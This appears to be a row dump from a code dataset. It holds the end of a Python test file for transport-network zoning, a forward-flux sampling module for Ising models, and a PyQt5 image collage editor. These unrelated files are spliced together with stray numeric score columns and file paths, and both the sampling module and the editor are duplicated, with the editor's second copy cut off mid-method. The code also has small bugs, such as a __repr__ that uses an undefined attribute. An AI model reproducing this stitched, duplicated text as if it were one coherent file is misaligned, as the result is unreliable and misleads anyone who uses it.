self.assertEqual(shapely.wkb.loads(wkb), geo, "Zone didn't save geometry properly")
def __change_project(self):
self.proj.close()
self.proj = Project()
self.proj = create_example(join(gettempdir(), uuid4().hex), 'nauru')
zones = 5
network = self.proj.network
nodes = network.nodes
geo = network.convex_hull()
zone_area = geo.area / zones
zone_side = sqrt(2 * sqrt(3) * zone_area / 9)
extent = network.extent()
curr = self.proj.conn.cursor()
b = extent.bounds
curr.execute('select st_asbinary(HexagonalGrid(GeomFromWKB(?), ?, 0, GeomFromWKB(?)))',
[extent.wkb, zone_side, Point(b[2], b[3]).wkb])
grid = curr.fetchone()[0]
grid = shapely.wkb.loads(grid)
grid = [p for p in grid if p.intersects(geo)]
zoning = self.proj.zoning
for i, zone_geo in enumerate(grid):
zone = zoning.new(i + 1)
zone.geometry = zone_geo
zone.save()
node = nodes.get(i + 1)
node.renumber(i + 10001)
def test_add_centroid(self):
self.__change_project()
zones = self.proj.zoning
nodes = self.proj.network.nodes
network = self.proj.network
zone1 = zones.get(1)
tot = network.count_centroids()
zone1.add_centroid(None)
self.assertEqual(tot + 1, network.count_centroids(), "Added less than it should've")
tot = network.count_centroids()
zone1.add_centroid(None)
zone1.add_centroid(Point(0, 0))
self.assertEqual(tot, network.count_centroids(), "Added more than should've")
node1 = nodes.get(1)
self.assertEqual(node1.geometry, zone1.geometry.centroid)
zone2 = zones.get(2)
zone2.add_centroid(Point(0, 0))
node2 = nodes.get(2)
self.assertEqual(node2.geometry, Point(0, 0))
def test_connect_mode(self):
self.__change_project()
curr = self.proj.conn.cursor()
zones = self.proj.zoning
zone1 = zones.get(1)
zone1.add_centroid(None)
zone1.connect_mode('c')
curr.execute('Select count(*) from links where a_node=?', [1])
self.assertIsNot(0, curr.fetchone()[0], 'failed to add connectors')
zone1.connect_mode('t')
curr.execute('''Select count(*) from links where a_node=? and instr(modes,'t')>0''', [1])
self.assertIsNot(0, curr.fetchone()[0], 'failed to add connectors for mode t')
# Cannot connect a centroid that does not exist
with self.assertRaises(ValueError):
zone2 = zones.get(2)
zone2.connect_mode('c')
def test_disconnect_mode(self):
self.__change_project()
curr = self.proj.conn.cursor()
zones = self.proj.zoning
zone1 = zones.get(1)
zone1.add_centroid(None)
zone1.connect_mode('c')
zone1.connect_mode('w')
curr.execute('''select COUNT(*) from links where a_node=1''')
tot = curr.fetchone()[0]
curr.execute('''Update links set modes = modes || 'w' where instr(modes,'w')=0''')
self.proj.conn.commit()
zone1.disconnect_mode('w')
curr.execute('''select COUNT(*) from links where a_node=1''')
self.assertIsNot(tot, curr.fetchone()[0], 'failed to delete links')
curr.execute('''Select count(*) from links where a_node=1 and instr(modes,'w')>0''')
self.assertEqual(curr.fetchone()[0], 0, 'Failed to remove mode from all connectors') | 0.52975 | 0.472136 |
import sys
import time
import attr
import numpy as np
import tqdm
from .utils import stat_str
class FFSampler:
pass
@attr.s
class FFInterface:
order = attr.ib(type=float)
states = attr.ib(factory=list)
log10_rate = attr.ib(0.0)
s_up = attr.ib(0)
s_down = attr.ib(0)
s_timeout = attr.ib(0)
def up_flow(self):
return (self.s_up / max(self.s_up + self.s_down, 1))
def __repr__(self):
return f"<{self.__class__.__name__}({self.order:.4g}) {len(self.states)} samples, {self.s_up}U {self.s_down}D {self.s_timeout}TO, rate {self.rate:.3g}>"
def reset_counts(self):
self.s_up = 0
self.s_down = 0
self.s_timeout = 0
class FFSampler:
def __init__(self, init_states, interfaces, iface_samples=100):
self.init_states = init_states
self.iface_samples = iface_samples
self.interfaces = [
iface if isinstance(iface, FFInterface) else FFInterface(iface) for iface in interfaces
]
self.ifaceA = self.interfaces[0]
self.ifaceB = self.interfaces[-1]
def compute(self, progress=True, report_degs=False, timeout=100.0, dynamic_ifaces=False, stop_rate=None):
self.sample_interface_A(progress=progress, timeout=timeout)
print(f"Rate at iface A ({self.ifaceA.order}) is {10 ** self.ifaceA.log10_rate:.3g} ups/MCSS/spin")
step = 10
maxstep = max((self.ifaceB.order - self.ifaceA.order) // 20, 1)
ino = 1
while True:
prev = self.interfaces[ino - 1]
if not dynamic_ifaces:
iface = self.interfaces[ino]
else:
its = 0
last_dir = 0
while True:
iface = FFInterface(min(prev.order + step, self.ifaceB.order))
ok = self.sample_interface(iface, prev=prev, progress=False, timeout=timeout, iface_samples=10, max_timeouts=1)
upflow = prev.up_flow()
if not ok:
print(f" .. failed to estimate step at {iface.order}, too many timeouts (upflow {upflow:.3f}, step {step})")
prev.reset_counts()
if False and its > 0:
print(f" .. tried {iface.order} (step {step}), upflow {upflow:.3f}")
its += 1
if upflow >= 0.5 and step < maxstep and its < 10 and last_dir >= 0:
step = min(max(int(step * 2), step + 1), maxstep)
last_dir = 1
continue
elif upflow <= 0.15 and step > 1 and its < 10:
step = step * 2 // 3
last_dir = -1
continue
elif iface.order == self.ifaceB.order:
iface = self.ifaceB
break
else:
self.interfaces.insert(-1, FFInterface(iface.order))
iface = self.interfaces[ino]
break
self.sample_interface(iface, prev=prev, progress=progress, timeout=timeout)
s = f"done {ino}/{len(self.interfaces)} ifaces [{iface.order}]"
if dynamic_ifaces:
s = f"done [{iface.order}/{self.ifaceB.order}]"
up_norm = prev.up_flow() ** (1 / (iface.order - prev.order))
print(f" {s}, up flow {prev.up_flow():.3f} (normalized {up_norm:.3f}), rate 10^{iface.log10_rate:.3f}={10**iface.log10_rate:.3g}, " +
f"orders {stat_str([s.get_order() for s in iface.states], True)}")
ino += 1
if dynamic_ifaces and self.ifaceB == iface:
break
if (not dynamic_ifaces) and ino == len(self.interfaces):
break
if stop_rate is not None and stop_rate > iface.log10_rate:
print(f" Rate below stop_rate 10^{stop_rate:.3f}, stopping")
break
def sample_interface_A(self, progress, timeout):
up_times = []
a = self.ifaceA.order
if progress:
pb = tqdm.tqdm(range(self.iface_samples),
f"Iface A ({a:.2f}) rate",
dynamic_ncols=True,
leave=False,
file=progress if progress is not True else sys.stderr)
state = None
t_up = None
timeouts = 0
while min(len(up_times), len(self.ifaceA.states)) < self.iface_samples:
if progress:
pb.set_postfix_str(f"times {stat_str(up_times, True)}, {timeouts} TOs")
pb.display()
if state is None:
t_up = None
state = np.random.choice(self.init_states).copy()
state.seed = np.random.randint(1 << 60)
# Update to be <A
state.update_until(a, 1 << 30, timeout=timeout)
if state.get_order() >= a:
state = None
timeouts += 1
if t_up is not None:
up_times.append(timeout)
continue
# Update to be >=A
state.update_until(0, self.ifaceA.order, timeout=timeout)
if state.get_order() < a:
state = None
timeouts += 1
if t_up is not None:
up_times.append(timeout)
continue
if t_up is not None:
up_times.append(state.updates - t_up)
t_up = state.updates
self.ifaceA.states.append(state.copy())
if progress:
pb.update(min(len(up_times), len(self.ifaceA.states)) - pb.n)
self.ifaceA.log10_rate = np.log10(1.0 / np.mean(up_times) / state.n)
if progress:
pb.update(min(len(up_times), len(self.ifaceA.states)) - pb.n)
pb.close()
print(pb)
def sample_interface(self, iface, prev, progress, timeout, iface_samples=None, max_timeouts=None):
"Return False on too many timeouts"
if iface_samples is None:
iface_samples = self.iface_samples
if progress:
pb = tqdm.tqdm(range(iface_samples),
f"Iface {iface.order:8.2f}",
dynamic_ncols=True,
leave=False,
file=progress if progress is not True else sys.stderr)
while len(iface.states) < iface_samples:
# Select clustering seed for this pop
state = np.random.choice(prev.states).copy()
state.seed = np.random.randint(1 << 60)
state.update_until(self.ifaceA.order, iface.order, timeout=timeout)
if state.get_order() < self.ifaceA.order:
prev.s_down += 1
elif state.get_order() >= iface.order:
prev.s_up += 1
iface.states.append(state.copy())
else:
prev.s_timeout += 1
if max_timeouts is not None and prev.s_timeout >= max_timeouts:
return False
if progress:
pb.update(len(iface.states) - pb.n)
pb.set_postfix_str(f"{prev.s_up:>3}U {prev.s_down:>3}D {prev.s_timeout:>3}TO")
if progress:
pb.update(len(iface.states) - pb.n)
pb.close()
print(pb)
iface.log10_rate = prev.log10_rate + np.log10(prev.up_flow())
return True
def critical_order_param(self):
last_r = self.ifaceB.log10_rate
if last_r == 0.0:
return None
for ino, iface in enumerate(self.interfaces):
if iface.log10_rate < last_r + np.log10(2.0):
break
if ino == 0:
return 0.0
prev = self.interfaces[ino - 1]
# print(f"Locating {last_r * 2.0} in {prev.rate} .. {iface.rate} ({prev.order} .. {iface.order})")
la = prev.log10_rate
lx = last_r + np.log10(2.0)
lb = iface.log10_rate
return ((lx - la) * iface.order + (lb - lx) * prev.order) / (lb - la) | netising/forward_flux.py | import sys
import time
import attr
import numpy as np
import tqdm
from .utils import stat_str
class FFSampler:
pass
@attr.s
class FFInterface:
order = attr.ib(type=float)
states = attr.ib(factory=list)
log10_rate = attr.ib(0.0)
s_up = attr.ib(0)
s_down = attr.ib(0)
s_timeout = attr.ib(0)
def up_flow(self):
return (self.s_up / max(self.s_up + self.s_down, 1))
def __repr__(self):
return f"<{self.__class__.__name__}({self.order:.4g}) {len(self.states)} samples, {self.s_up}U {self.s_down}D {self.s_timeout}TO, rate {self.rate:.3g}>"
def reset_counts(self):
self.s_up = 0
self.s_down = 0
self.s_timeout = 0
class FFSampler:
def __init__(self, init_states, interfaces, iface_samples=100):
self.init_states = init_states
self.iface_samples = iface_samples
self.interfaces = [
iface if isinstance(iface, FFInterface) else FFInterface(iface) for iface in interfaces
]
self.ifaceA = self.interfaces[0]
self.ifaceB = self.interfaces[-1]
def compute(self, progress=True, report_degs=False, timeout=100.0, dynamic_ifaces=False, stop_rate=None):
self.sample_interface_A(progress=progress, timeout=timeout)
print(f"Rate at iface A ({self.ifaceA.order}) is {10 ** self.ifaceA.log10_rate:.3g} ups/MCSS/spin")
step = 10
maxstep = max((self.ifaceB.order - self.ifaceA.order) // 20, 1)
ino = 1
while True:
prev = self.interfaces[ino - 1]
if not dynamic_ifaces:
iface = self.interfaces[ino]
else:
its = 0
last_dir = 0
while True:
iface = FFInterface(min(prev.order + step, self.ifaceB.order))
ok = self.sample_interface(iface, prev=prev, progress=False, timeout=timeout, iface_samples=10, max_timeouts=1)
upflow = prev.up_flow()
if not ok:
print(f" .. failed to estimate step at {iface.order}, too many timeouts (upflow {upflow:.3f}, step {step})")
prev.reset_counts()
if False and its > 0:
print(f" .. tried {iface.order} (step {step}), upflow {upflow:.3f}")
its += 1
if upflow >= 0.5 and step < maxstep and its < 10 and last_dir >= 0:
step = min(max(int(step * 2), step + 1), maxstep)
last_dir = 1
continue
elif upflow <= 0.15 and step > 1 and its < 10:
step = step * 2 // 3
last_dir = -1
continue
elif iface.order == self.ifaceB.order:
iface = self.ifaceB
break
else:
self.interfaces.insert(-1, FFInterface(iface.order))
iface = self.interfaces[ino]
break
self.sample_interface(iface, prev=prev, progress=progress, timeout=timeout)
s = f"done {ino}/{len(self.interfaces)} ifaces [{iface.order}]"
if dynamic_ifaces:
s = f"done [{iface.order}/{self.ifaceB.order}]"
up_norm = prev.up_flow() ** (1 / (iface.order - prev.order))
print(f" {s}, up flow {prev.up_flow():.3f} (normalized {up_norm:.3f}), rate 10^{iface.log10_rate:.3f}={10**iface.log10_rate:.3g}, " +
f"orders {stat_str([s.get_order() for s in iface.states], True)}")
ino += 1
if dynamic_ifaces and self.ifaceB == iface:
break
if (not dynamic_ifaces) and ino == len(self.interfaces):
break
if stop_rate is not None and stop_rate > iface.log10_rate:
print(f" Rate below stop_rate 10^{stop_rate:.3f}, stopping")
break
def sample_interface_A(self, progress, timeout):
up_times = []
a = self.ifaceA.order
if progress:
pb = tqdm.tqdm(range(self.iface_samples),
f"Iface A ({a:.2f}) rate",
dynamic_ncols=True,
leave=False,
file=progress if progress is not True else sys.stderr)
state = None
t_up = None
timeouts = 0
while min(len(up_times), len(self.ifaceA.states)) < self.iface_samples:
if progress:
pb.set_postfix_str(f"times {stat_str(up_times, True)}, {timeouts} TOs")
pb.display()
if state is None:
t_up = None
state = np.random.choice(self.init_states).copy()
state.seed = np.random.randint(1 << 60)
# Update to be <A
state.update_until(a, 1 << 30, timeout=timeout)
if state.get_order() >= a:
state = None
timeouts += 1
if t_up is not None:
up_times.append(timeout)
continue
# Update to be >=A
state.update_until(0, self.ifaceA.order, timeout=timeout)
if state.get_order() < a:
state = None
timeouts += 1
if t_up is not None:
up_times.append(timeout)
continue
if t_up is not None:
up_times.append(state.updates - t_up)
t_up = state.updates
self.ifaceA.states.append(state.copy())
if progress:
pb.update(min(len(up_times), len(self.ifaceA.states)) - pb.n)
self.ifaceA.log10_rate = np.log10(1.0 / np.mean(up_times) / state.n)
if progress:
pb.update(min(len(up_times), len(self.ifaceA.states)) - pb.n)
pb.close()
print(pb)
def sample_interface(self, iface, prev, progress, timeout, iface_samples=None, max_timeouts=None):
"Return False on too many timeouts"
if iface_samples is None:
iface_samples = self.iface_samples
if progress:
pb = tqdm.tqdm(range(iface_samples),
f"Iface {iface.order:8.2f}",
dynamic_ncols=True,
leave=False,
file=progress if progress is not True else sys.stderr)
while len(iface.states) < iface_samples:
# Select clustering seed for this pop
state = np.random.choice(prev.states).copy()
state.seed = np.random.randint(1 << 60)
state.update_until(self.ifaceA.order, iface.order, timeout=timeout)
if state.get_order() < self.ifaceA.order:
prev.s_down += 1
elif state.get_order() >= iface.order:
prev.s_up += 1
iface.states.append(state.copy())
else:
prev.s_timeout += 1
if max_timeouts is not None and prev.s_timeout >= max_timeouts:
return False
if progress:
pb.update(len(iface.states) - pb.n)
pb.set_postfix_str(f"{prev.s_up:>3}U {prev.s_down:>3}D {prev.s_timeout:>3}TO")
if progress:
pb.update(len(iface.states) - pb.n)
pb.close()
print(pb)
iface.log10_rate = prev.log10_rate + np.log10(prev.up_flow())
return True
def critical_order_param(self):
last_r = self.ifaceB.log10_rate
if last_r == 0.0:
return None
for ino, iface in enumerate(self.interfaces):
if iface.log10_rate < last_r + np.log10(2.0):
break
if ino == 0:
return 0.0
prev = self.interfaces[ino - 1]
# print(f"Locating {last_r * 2.0} in {prev.rate} .. {iface.rate} ({prev.order} .. {iface.order})")
la = prev.log10_rate
lx = last_r + np.log10(2.0)
lb = iface.log10_rate
return ((lx - la) * iface.order + (lb - lx) * prev.order) / (lb - la) | 0.327561 | 0.169131 |
import sys
import cv2 as cv
from PyQt5.QtCore import QMimeData, QPointF, Qt, QObject, pyqtSlot, QSize, QAbstractListModel, QRectF
from PyQt5.QtGui import QImage, QPixmap, QDrag, QPainter, QStandardItemModel, QIcon, QPen
from PyQt5.QtWidgets import (QApplication, QDialog, QFileDialog, QGridLayout,
QLabel, QPushButton, QWidget, QVBoxLayout, QListWidget, QAbstractItemView, QHBoxLayout,
QListView, QListWidgetItem, QMainWindow, QStackedWidget, QStackedLayout, QMenu, QMenuBar,
QAction, QSpacerItem, QSizePolicy, QSlider)
from crop import MainCropWindow
from cut import MainCutWindow
from image import ImgLabel
class MainQWidget(QWidget):
def __init__(self, parent=None):
super(MainQWidget, self).__init__(parent)
self.layout = QStackedLayout(self)
self.main_board = QWidget()
self.crop_main_window = QMainWindow()
self.cut_main_window = QMainWindow()
self.main_board_layout = QHBoxLayout()
self.main_board.setLayout(self.main_board_layout)
# self.main_board.setFixedSize(1920, 1280)
self.image_board = ImgLabel()
# self.image_lists = QListWidget()
self.image_lists = Gallery()
self.main_board_layout.addWidget(self.image_lists, 1)
self.main_board_layout.addWidget(self.image_board, 2)
# self.crop_board = CropLabel()
# self.crop_board.setAlignment(Qt.AlignCenter)
self.crop_board = MainCropWindow()
self.cut_board = MainCutWindow()
self.cut_board_bar = QWidget()
cut_board_bar_layout = QHBoxLayout(self.cut_board_bar)
self.cut_board_bar.setLayout(cut_board_bar_layout)
self.cut_board_slider = QSlider(Qt.Horizontal)
self.cut_board_slider.setValue(10)
self.cut_board_slider.setMinimum(1)
self.cut_board_bar_undo_button = QPushButton("undo")
self.cut_board_bar_redo_button = QPushButton("redo")
self.cut_board_bar_undo_button.clicked.connect(self.cut_board.eraseUndo)
self.cut_board_bar_redo_button.clicked.connect(self.cut_board.eraseRedo)
self.cut_board_slider.valueChanged.connect(self.cut_board_erase_resize)
cut_board_bar_layout.addWidget(self.cut_board_slider)
cut_board_bar_layout.addWidget(self.cut_board_bar_undo_button)
cut_board_bar_layout.addWidget(self.cut_board_bar_redo_button)
# self.cut_board = QWidget()
self.cut_window = QWidget()
self.cut_layout = QVBoxLayout()
# self.cut_board.setLayout(cut_layout)
self.cut_window.setLayout(self.cut_layout)
self.cut_layout.addWidget(self.cut_board, 0)
self.cut_layout.addWidget(self.cut_board_bar, 1)
self.crop_main_window.setCentralWidget(self.crop_board)
self.cut_main_window.setCentralWidget(self.cut_window)
crop_menu = QMenuBar()
crop_menu.addAction('Free')
crop_menu.addAction('4:3')
crop_menu.addAction('3:4')
crop_menu.addAction('1:1')
crop_menu.addAction('Done', lambda: self.set_crop_mode(False))
cut_menu = QMenuBar()
cut_menu.addAction('Cut', lambda: self.set_cut_repair(0))
cut_menu.addAction('Repair', lambda: self.set_cut_repair(1))
cut_menu.addAction('Clean', lambda: self.set_cut_repair(2))
cut_menu.addAction('Done', lambda : self.set_cut_mode(False))
self.crop_main_window.setMenuBar(crop_menu)
self.cut_main_window.setMenuBar(cut_menu)
self.layout.addWidget(self.main_board)
self.layout.addWidget(self.crop_main_window)
self.layout.addWidget(self.cut_main_window)
self.layout.setCurrentWidget(self.main_board)
# self.layout.setCurrentIndex(0)
self.img = None
def set_cut_repair(self, mode):
# cut
if mode == 0:
self.cut_board.mode = 0
# repair
elif mode == 1:
self.cut_board.mode = 1
# clean
elif mode == 2:
self.cut_board.clean()
self.cut_board.mode = 0
def set_crop_mode(self, mode, qPixmap=None):
print('start cropping: {}'.format(mode))
if mode:
# Set crop Rect
self.crop_board.setPixmap(qPixmap)
# print(self.crop_board.sizeHint())
# self.crop_main_window.setFixedSize(self.crop_board.sizeHint())
# print(self.crop_main_window.size())
window.setFixedSize(self.crop_main_window.sizeHint())
# self.setFixedSize(self.crop_main_window.size())
# self.layout.setCurrentIndex(1)
self.layout.setCurrentWidget(self.crop_main_window)
# print(123)
else:
print('SetCroppedImg')
self.layout.setCurrentIndex(0)
# TODO self.crop_board.scene.cropped_img FIXED SIZE
window.setCroppedImg(self.crop_board.scene.cropped_img)
def set_cut_mode(self, mode, img=None, imgEraseArea=None):
if mode:
print('start to cut')
self.cut_board.initialize(img, imgEraseArea)
# self.cut_board.setPixmap(qPixmap)
print('self.cut_main_window.sizeHint(): {}'.format(self.cut_main_window.sizeHint()))
# window.setFixedSize(self.cut_main_window.sizeHint())
window.setFixedSize(self.cut_window.sizeHint())
self.layout.setCurrentWidget(self.cut_main_window)
else:
self.image_board.imgLayerEraseArea[self.image_board.selectedImgIndex] = self.cut_board.scene.eraseArea[self.cut_board.scene.eraseAreaCurrentIndex]
self.layout.setCurrentWidget(self.main_board)
self.image_board.changeImg(self.cut_board.scene.cuttedImg, self.image_board.selectedImgIndex)
w, h = self.image_board.pixmap().width(), self.image_board.pixmap().height()
self.image_board.setFixedSize(w, h)
self.image_lists.setFixedSize(window.image_list_width, h)
window.setFixedSize(w + self.image_lists.width(), h)
def cut_board_erase_resize(self, value):
self.cut_board.eraserRadius = value
self.cut_board.update()
print(value)
class Gallery(QListWidget):
def __init__(self):
super(Gallery, self).__init__()
self.indexfrom = -1
self.itemClicked.connect(self.getImg)
self.itemPressed.connect(self.getIndex)
def getIndex(self, item):
self.indexfrom = window.mainWindow.image_lists.indexFromItem(item).row()
print('self.indexfrom: {}'.format(self.indexfrom))
def dropEvent(self, e):
print('self.currentRow() in dropevent: {}'.format(self.currentRow()))
if self.currentRow() > 0:
super(Gallery, self).dropEvent(e)
# force to 1
if self.currentRow() == 0:
print('force to 1')
item = self.takeItem(0)
print('self.count(): {}'.format(self.count()))
self.insertItem(1, item)
print('self.count(): {}'.format(self.count()))
self.setCurrentRow(1)
print('curRow: {}'.format(self.currentRow()))
assert self.currentRow() == 1
print('curRow: {}'.format(self.currentRow()))
assert self.currentRow() > 0
print('from -> to : {} -> {}'.format(self.indexfrom, self.currentRow()))
if self.indexfrom != self.currentRow():
window.mainWindow.image_board.reorder(self.indexfrom, self.currentRow())
def getImg(self, item):
window.mainWindow.image_board.selectImage(self.indexfrom)
def addItem(self, item):
super(Gallery, self).addItem(item)
def removeImg(self, index):
print('index: {}'.format(index))
item = self.takeItem(index)
print(self.count())
class MainWindow(QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.image_list_width = 256
self.image_board_height = 1080
self.image_board_width = 1920
# MainWindow Size
self.resize(QSize(self.image_board_width + self.image_list_width, self.image_board_height))
button_list = QMenuBar()
button_list.addAction('SetBackGround', self.setBackGround)
button_list.addAction('AddImage', self.addImage)
button_list.addAction('SaveImage', self.saveImage)
button_list.addAction('ResizeMode', self.setresizeMode)
button_list.addAction('MoveMode', self.setmoveMode)
button_list.addAction('FlipMode', self.setflipMode)
button_list.addAction('TurnMode', self.setturnMode)
button_list.addAction('RemoveImage', self.removeImg)
button_list.addAction('Cut', self.cutImg)
self.setMenuBar(button_list)
self.mainWindow = MainQWidget()
self.setCentralWidget(self.mainWindow)
self.setBG = False
def removeImg(self):
index = self.mainWindow.image_board.selectedImgIndex
if index > 0:
self.mainWindow.image_board.removeImg(index)
self.mainWindow.image_lists.removeImg(index)
def setBackGround(self):
self.mainWindow.image_lists.clear()
self.mainWindow.image_lists.setViewMode(QListView.ListMode)
self.mainWindow.image_lists.setDragDropMode(QAbstractItemView.InternalMove)
self.mainWindow.image_board.initialize()
self.setBG = True
self.addImage()
def addImage(self):
filename, tmp = QFileDialog.getOpenFileName(
self, caption='Open Image', directory='./images', filter='*.png *.jpg *.bmp')
if filename is '':
return
src = cv.imread(filename)
# dst = cv.resize(src, dsize=(348, 720), interpolation=cv.INTER_CUBIC)
self.mainWindow.img = src
height, width, channel = self.mainWindow.img.shape
bytesPerLine = 3 * width
qImg = QImage(self.mainWindow.img.data, width, height, bytesPerLine,
QImage.Format_RGB888).rgbSwapped()
qPixmap = QPixmap.fromImage(qImg)
# TODO RESIZE IMAGE
qPixmap = qPixmap.scaledToHeight(720)
self.mainWindow.set_crop_mode(True, qPixmap)
# TODO main Window size 保持不變 crop window 可變動
# TODO addimage 不要更動window size 同時保證大小不超過background
# self.mainWindow.image_board.setPixmap(qPixmap)
# print(456)
# image_list_item = QListWidgetItem()
# icon = QIcon()
# icon.addPixmap(qPixmap, QIcon.Normal, QIcon.Off)
# image_list_item.setIcon(icon)
# self.mainWindow.image_lists.addItem(image_list_item)
def setCroppedImg(self, qPixmap):
self.mainWindow.image_board.addPixmap(qPixmap)
image_list_item = QListWidgetItem()
icon = QIcon()
icon.addPixmap(qPixmap, QIcon.Normal, QIcon.Off)
image_list_item.setIcon(icon)
self.mainWindow.image_lists.addItem(image_list_item)
if self.setBG:
w, h = self.mainWindow.image_board.pixmap().width(), self.mainWindow.image_board.pixmap().height()
# TODO comment out
print('w, h: ({}, {})'.format(w, h))
self.mainWindow.image_board.setFixedSize(w, h)
self.mainWindow.image_lists.setFixedSize(self.image_list_width, h)
self.setFixedSize(w + self.mainWindow.image_lists.width(), h)
def saveImage(self):
print('Save Image')
filename, tmp = QFileDialog.getSaveFileName(
self, caption='Save Image', directory='./images', filter='*.png *.jpg *.bmp')
self.mainWindow.image_board.pixmap().toImage().save(filename)
def setmoveMode(self):
self.mainWindow.image_board.mode = 0
self.mainWindow.image_board.update()
def setresizeMode(self):
self.mainWindow.image_board.mode = 1
self.mainWindow.image_board.update()
def setflipMode(self):
self.mainWindow.image_board.mode = 2
self.mainWindow.image_board.update()
def setturnMode(self):
self.mainWindow.image_board.mode = 3
self.mainWindow.image_board.update()
def cutImg(self):
if self.mainWindow.image_board.selectedImgIndex > 0:
# print('self.mainWindow.image_board.selectedImgIndex: {}'.format(self.mainWindow.image_board.selectedImgIndex))
print(self.mainWindow.image_board.imgLayerOrigin, self.mainWindow.image_board.imgLayerEraseArea)
img = self.mainWindow.image_board.imgLayerOrigin[self.mainWindow.image_board.selectedImgIndex]
imgEraseArea = self.mainWindow.image_board.imgLayerEraseArea[self.mainWindow.image_board.selectedImgIndex]
# self.mainWindow.set_cut_mode(True, img)
self.mainWindow.set_cut_mode(True, img, imgEraseArea)
if __name__ == '__main__':
app = QApplication(sys.argv)
window = MainWindow()
window.show()
app.exec_() | main.py | import sys
import cv2 as cv
from PyQt5.QtCore import QMimeData, QPointF, Qt, QObject, pyqtSlot, QSize, QAbstractListModel, QRectF
from PyQt5.QtGui import QImage, QPixmap, QDrag, QPainter, QStandardItemModel, QIcon, QPen
from PyQt5.QtWidgets import (QApplication, QDialog, QFileDialog, QGridLayout,
QLabel, QPushButton, QWidget, QVBoxLayout, QListWidget, QAbstractItemView, QHBoxLayout,
QListView, QListWidgetItem, QMainWindow, QStackedWidget, QStackedLayout, QMenu, QMenuBar,
QAction, QSpacerItem, QSizePolicy, QSlider)
from crop import MainCropWindow
from cut import MainCutWindow
from image import ImgLabel
class MainQWidget(QWidget):
def __init__(self, parent=None):
super(MainQWidget, self).__init__(parent)
self.layout = QStackedLayout(self)
self.main_board = QWidget()
self.crop_main_window = QMainWindow()
self.cut_main_window = QMainWindow()
self.main_board_layout = QHBoxLayout()
self.main_board.setLayout(self.main_board_layout)
# self.main_board.setFixedSize(1920, 1280)
self.image_board = ImgLabel()
# self.image_lists = QListWidget()
self.image_lists = Gallery()
self.main_board_layout.addWidget(self.image_lists, 1)
self.main_board_layout.addWidget(self.image_board, 2)
# self.crop_board = CropLabel()
# self.crop_board.setAlignment(Qt.AlignCenter)
self.crop_board = MainCropWindow()
self.cut_board = MainCutWindow()
self.cut_board_bar = QWidget()
cut_board_bar_layout = QHBoxLayout(self.cut_board_bar)
self.cut_board_bar.setLayout(cut_board_bar_layout)
self.cut_board_slider = QSlider(Qt.Horizontal)
self.cut_board_slider.setValue(10)
self.cut_board_slider.setMinimum(1)
self.cut_board_bar_undo_button = QPushButton("undo")
self.cut_board_bar_redo_button = QPushButton("redo")
self.cut_board_bar_undo_button.clicked.connect(self.cut_board.eraseUndo)
self.cut_board_bar_redo_button.clicked.connect(self.cut_board.eraseRedo)
self.cut_board_slider.valueChanged.connect(self.cut_board_erase_resize)
cut_board_bar_layout.addWidget(self.cut_board_slider)
cut_board_bar_layout.addWidget(self.cut_board_bar_undo_button)
cut_board_bar_layout.addWidget(self.cut_board_bar_redo_button)
# self.cut_board = QWidget()
self.cut_window = QWidget()
self.cut_layout = QVBoxLayout()
# self.cut_board.setLayout(cut_layout)
self.cut_window.setLayout(self.cut_layout)
self.cut_layout.addWidget(self.cut_board, 0)
self.cut_layout.addWidget(self.cut_board_bar, 1)
self.crop_main_window.setCentralWidget(self.crop_board)
self.cut_main_window.setCentralWidget(self.cut_window)
crop_menu = QMenuBar()
crop_menu.addAction('Free')
crop_menu.addAction('4:3')
crop_menu.addAction('3:4')
crop_menu.addAction('1:1')
crop_menu.addAction('Done', lambda: self.set_crop_mode(False))
cut_menu = QMenuBar()
cut_menu.addAction('Cut', lambda: self.set_cut_repair(0))
cut_menu.addAction('Repair', lambda: self.set_cut_repair(1))
cut_menu.addAction('Clean', lambda: self.set_cut_repair(2))
cut_menu.addAction('Done', lambda : self.set_cut_mode(False))
self.crop_main_window.setMenuBar(crop_menu)
self.cut_main_window.setMenuBar(cut_menu)
self.layout.addWidget(self.main_board)
self.layout.addWidget(self.crop_main_window)
self.layout.addWidget(self.cut_main_window)
self.layout.setCurrentWidget(self.main_board)
# self.layout.setCurrentIndex(0)
self.img = None
def set_cut_repair(self, mode):
# cut
if mode == 0:
self.cut_board.mode = 0
# repair
elif mode == 1:
self.cut_board.mode = 1
# clean
elif mode == 2:
self.cut_board.clean()
self.cut_board.mode = 0
def set_crop_mode(self, mode, qPixmap=None):
print('start cropping: {}'.format(mode))
if mode:
# Set crop Rect
self.crop_board.setPixmap(qPixmap)
# print(self.crop_board.sizeHint())
# self.crop_main_window.setFixedSize(self.crop_board.sizeHint())
# print(self.crop_main_window.size())
window.setFixedSize(self.crop_main_window.sizeHint())
# self.setFixedSize(self.crop_main_window.size())
# self.layout.setCurrentIndex(1)
self.layout.setCurrentWidget(self.crop_main_window)
# print(123)
else:
print('SetCroppedImg')
self.layout.setCurrentIndex(0)
# TODO self.crop_board.scene.cropped_img FIXED SIZE
window.setCroppedImg(self.crop_board.scene.cropped_img)
def set_cut_mode(self, mode, img=None, imgEraseArea=None):
if mode:
print('start to cut')
self.cut_board.initialize(img, imgEraseArea)
# self.cut_board.setPixmap(qPixmap)
print('self.cut_main_window.sizeHint(): {}'.format(self.cut_main_window.sizeHint()))
# window.setFixedSize(self.cut_main_window.sizeHint())
window.setFixedSize(self.cut_window.sizeHint())
self.layout.setCurrentWidget(self.cut_main_window)
else:
self.image_board.imgLayerEraseArea[self.image_board.selectedImgIndex] = self.cut_board.scene.eraseArea[self.cut_board.scene.eraseAreaCurrentIndex]
self.layout.setCurrentWidget(self.main_board)
self.image_board.changeImg(self.cut_board.scene.cuttedImg, self.image_board.selectedImgIndex)
w, h = self.image_board.pixmap().width(), self.image_board.pixmap().height()
self.image_board.setFixedSize(w, h)
self.image_lists.setFixedSize(window.image_list_width, h)
window.setFixedSize(w + self.image_lists.width(), h)
def cut_board_erase_resize(self, value):
self.cut_board.eraserRadius = value
self.cut_board.update()
print(value)
class Gallery(QListWidget):
def __init__(self):
super(Gallery, self).__init__()
self.indexfrom = -1
self.itemClicked.connect(self.getImg)
self.itemPressed.connect(self.getIndex)
def getIndex(self, item):
self.indexfrom = window.mainWindow.image_lists.indexFromItem(item).row()
print('self.indexfrom: {}'.format(self.indexfrom))
def dropEvent(self, e):
print('self.currentRow() in dropevent: {}'.format(self.currentRow()))
if self.currentRow() > 0:
super(Gallery, self).dropEvent(e)
# force to 1
if self.currentRow() == 0:
print('force to 1')
item = self.takeItem(0)
